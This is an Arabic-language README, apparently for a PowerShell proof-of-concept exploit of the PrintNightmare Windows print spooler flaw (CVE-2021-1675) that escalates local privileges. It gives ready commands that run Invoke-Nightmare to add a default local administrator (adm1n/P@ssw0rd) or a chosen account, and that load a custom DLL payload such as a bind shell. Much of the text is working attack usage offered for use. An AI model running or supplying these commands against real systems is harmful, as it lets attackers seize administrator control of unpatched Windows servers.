
Caleb Stewart | John Hammond | 1 يونيو 2021
CVE-2021-1675 هو ثغرة أمنية حرجة تتيح تنفيذ التعليمات البرمجية عن بُعد ورفع الامتيازات محليًا، وتُعرف باسم "PrintNightmare".
تم إصدار أكواد استغلال لإثبات الفكرة (Python, C++) لاستغلال قدرة تنفيذ التعليمات البرمجية عن بُعد، بالإضافة إلى نسخة C# لرفع الامتيازات محليًا. لم نرَ تطبيقًا أصليًا بلغة PowerShell خالصة، وأردنا أن نجرب تحسين الاستغلال وإعادة صياغته.
يقوم هذا السكربت المكتوب بلغة PowerShell برفع الامتيازات محليًا (LPE) باستخدام تقنية هجوم PrintNightmare.

تم اختبار هذا السكربت على Windows Server 2016 وWindows Server 2019.
إضافة مستخدم جديد إلى مجموعة المسؤولين المحليين افتراضيًا:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
قم بتوفير حمولة DLL مخصصة، لفعل أي شيء آخر قد ترغب به.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"